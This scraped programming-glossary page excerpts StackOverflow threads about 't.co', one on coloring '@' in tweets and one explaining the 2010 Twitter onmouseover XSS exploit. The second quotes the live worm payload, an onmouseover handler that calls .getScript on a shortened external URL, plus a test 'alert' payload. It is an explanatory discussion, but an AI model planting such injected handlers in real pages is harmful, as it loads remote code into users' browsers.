¡@

Home 

2014/10/16 ¤W¤È 12:09:17

jquery Programming Glossary: t.co

if text contains '@' change color of '@'

http://stackoverflow.com/questions/17191076/if-text-contains-change-color-of

Teese draagt geprinte 3D jurk a target _blank href http t.co s2y6b21S0I http t.co s2y6b21S0I a via @ a target _blank href.. 3D jurk a target _blank href http t.co s2y6b21S0I http t.co s2y6b21S0I a via @ a target _blank href http twitter.com Knackweekend.. from the comments below var status ' a target _blank href t.co s2y6b21S0I http t.co s2y6b21S0I a via @ a target _blank href..

Today's XSS onmouseover exploit on twitter.com

http://stackoverflow.com/questions/3762746/todays-xss-onmouseover-exploit-on-twitter-com

causing people to post a tweet containing this link http t.co @ style font size 999999999999px onmouseover .getScript 'http.. the following URL is posted to Twitter http thisisatest.com @ onmouseover alert 'test xss' Twitter treats this as the URL... that code so the HTML now looks like a href http thisisatest.com @ onmouseover alert 'test xss' rel target _blank http thisisatest.com..

if text contains '@' change color of '@'

http://stackoverflow.com/questions/17191076/if-text-contains-change-color-of

status is a variable with content for ex. like this Dita Von Teese draagt geprinte 3D jurk a target _blank href http t.co s2y6b21S0I http t.co s2y6b21S0I a via @ a target _blank href http twitter.com Knackweekend Knackweekend a javascript jquery.. with content for ex. like this Dita Von Teese draagt geprinte 3D jurk a target _blank href http t.co s2y6b21S0I http t.co s2y6b21S0I a via @ a target _blank href http twitter.com Knackweekend Knackweekend a javascript jquery html css share.. color #f90 Updated since status appears to be a string from the comments below var status ' a target _blank href t.co s2y6b21S0I http t.co s2y6b21S0I a via @ a target _blank href twitter.com Knackweekend Knackweekend a ' newStatus status.replace..

Today's XSS onmouseover exploit on twitter.com

http://stackoverflow.com/questions/3762746/todays-xss-onmouseover-exploit-on-twitter-com

exactly happened on Twitter today Basically the exploit was causing people to post a tweet containing this link http t.co @ style font size 999999999999px onmouseover .getScript 'http u002f u002fis.gd u002ffl9A7' Is this technically an XSS attack.. is because URLs were not being parsed properly. For example the following URL is posted to Twitter http thisisatest.com @ onmouseover alert 'test xss' Twitter treats this as the URL. When it is parsed Twitter wraps a link around that code.. as the URL. When it is parsed Twitter wraps a link around that code so the HTML now looks like a href http thisisatest.com @ onmouseover alert 'test xss' rel target _blank http thisisatest.com @ onmouseover alert 'test xss' a span You can see..